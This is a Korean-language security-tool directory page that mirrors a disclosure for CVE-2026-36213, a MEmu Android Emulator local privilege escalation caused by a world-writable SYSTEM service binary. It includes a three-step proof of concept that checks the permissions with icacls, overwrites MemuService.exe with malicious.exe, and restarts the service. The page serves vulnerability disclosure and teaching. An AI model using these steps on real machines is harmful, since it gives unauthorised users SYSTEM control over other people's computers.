Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/sec-zone/cve-2026-36213
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingLearning & EducationBinary Exploitation
GitHubsec-zone/cve-2026-36213

CVE-2026-36213

CVE-2026-36213 | MEmu Android Emulator 9.2.7.0의 안전하지 않은 서비스 바이너리 권한을 통한 로컬 권한 상승 | 9.3.2에서 패치됨

저장소 보기
5123개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-36213

CVE-2026-36213 | MEmu Android Emulator 9.2.7.0에서 안전하지 않은 서비스 바이너리 권한을 통한 로컬 권한 상승 | 9.3.2에서 패치됨

CVE-2026-36213 — MEmu Android Emulator 9.2.7.0 LPE

CVE CVSS Status Platform

요약

MEmu Android Emulator 9.2.7.0의 로컬 권한 상승(LPE) 취약점입니다.
MEmuSVC 서비스가 NT AUTHORITY\SYSTEM 권한으로 실행되는 동안 해당 바이너리는 모든 로컬 사용자가 쓸 수 있어 완전한 시스템 장악이 가능합니다.

필드세부 정보
CVECVE-2026-36213
제품MEmu Android Emulator (MicroVirt)
영향을 받는 버전9.2.7.0 및 이전 버전
수정된 버전9.3.2
CWECWE-732 / CWE-269
CVSS v3.17.8 HIGH AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
ATT&CKT1574.010

취약점

MEmuService.exe는 안전하지 않은 NTFS 권한으로 SYSTEM 수준 Windows 서비스로 설치됩니다:

root@kitploit:~
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"

BUILTIN\Users:(F)   ← Any local user has Full Control
Everyone:(F)        ← World-writable binar

개념 증명

:: 1단계 - 취약한 권한 확인

root@kitploit:~
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"

:: 2단계 - 바이너리 교체 (낮은 권한 사용자)

root@kitploit:~
copy malicious.exe "C:\Program Files\Microvirt\MEmu\MemuService.exe" /Y

:: 3단계 - 서비스 재시작

root@kitploit:~
sc stop MEmuSVC && sc start MEmuSVC

:: 결과: malicious.exe가 NT AUTHORITY\SYSTEM 권한으로 실행됨

탐지 스크립트

다음 위치에서 확인 가능: https://github.com/sec-zone/Hijack-service-binaries

면책 조항

본 연구는 책임 있는 공개(responsible disclosure) 정책에 따라 교육 목적으로 수행되었습니다.
저자는 이 정보의 오용에 대해 책임을 지지 않습니다.

연구자

이름: Mohammad Hossein Ashofte Yazdi
Linkedin: https://www.linkedin.com/in/seczone64
Twitter: @sec_zone64
Email: [email protected]

도구 다운로드